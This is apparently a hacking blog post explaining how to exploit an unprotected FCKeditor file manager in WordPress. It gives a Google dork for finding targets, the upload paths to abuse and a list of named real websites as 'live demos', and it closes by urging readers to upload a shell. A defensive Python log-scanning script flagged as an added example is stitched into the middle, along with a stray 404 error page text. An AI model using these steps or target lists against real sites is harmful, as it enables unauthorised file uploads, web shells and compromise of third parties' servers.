Alright, in this entry I want to share with you all a new FCKeditor exploit for WordPress. There was already one before this, right? But this one is different :)
1. First, search with this Google dork:
inurl:"wp-content/plugins/fckeditor"
2. Pick one of the websites in the results and enter one of the exploits below:
Exploit:
- http://target.com/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html
- http://target.com/wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
3. The link to the file will be given after the upload.
Live demo:
http://rentanice.com/booking/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://sainttimothy.org/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://lifesaving.ca/blog/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://knike.fmf-radio.com/wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
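For site owners, the same paths can be turned into an access-log check. The following is an added example, not part of the original post: it scans Combined Log Format lines for requests under the plugin's file-manager directory and rates each client by whether the pages were actually served. The log lines, IP addresses and the `EXAMPLE-ENDPOINT` path are constructed, and the function and variable names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Prefix shared by both URLs in the post; everything below it belongs to the file manager.
FILEMANAGER = re.compile(r"/wp-content/plugins/fckeditor/editor/filemanager/", re.I)
# Combined Log Format: ip ident user [time] "METHOD path proto" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def triage(lines):
    """Map each client IP that touched the file manager to a verdict."""
    hits = defaultdict(list)
    for line in lines:
        match = LINE.match(line)
        if not match:
            continue  # not an access-log line
        ip, method, raw_path, status = match.groups()
        # Decode %xx first so an encoded path cannot slip past the pattern.
        if FILEMANAGER.search(unquote(raw_path)):
            hits[ip].append((method.upper(), int(status)))
    report = {}
    for ip, requests in hits.items():
        served = [method for method, status in requests if 200 <= status < 300]
        if "POST" in served:
            report[ip] = "upload-accepted"  # review the upload directory for new files
        elif served:
            report[ip] = "exposed"          # pages still reachable: remove or restrict them
        else:
            report[ip] = "probe-only"       # 404/403: files already removed or blocked
    return report

# Constructed sample lines (documentation IP ranges; EXAMPLE-ENDPOINT is a placeholder).
P = "/wp-content/plugins/fckeditor/editor/filemanager/"
T = "[01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 - - {T} "GET {P}browser/default/browser.html HTTP/1.1" 404 512',
    f'198.51.100.7 - - {T} "GET {P}connectors/uploadtest.html HTTP/1.1" 200 2048',
    f'203.0.113.5 - - {T} "GET /wp-content/plugins/%66ckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 2048',
    f'203.0.113.5 - - {T} "POST {P}connectors/EXAMPLE-ENDPOINT HTTP/1.1" 200 120',
    f'192.0.2.99 - - {T} "GET /index.php HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, verdict in sorted(triage(SAMPLE_LOG).items()):
        print(ip, verdict)
```

A "probe-only" verdict corresponds to the 404 case: the files are no longer there. Any "exposed" or "upload-accepted" verdict means the file-manager pages should be removed or access-restricted.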
That's all for this entry. Assalamualaikum.
404 Error File Not Found
The page you are looking for might have been removed,
had its name changed, or is temporarily unavailable.
Not every site can be accessed. That means the admin has already patched the vuln, that's why it's not found :)
If you can upload a shell... symlink to your heart's content. Hehe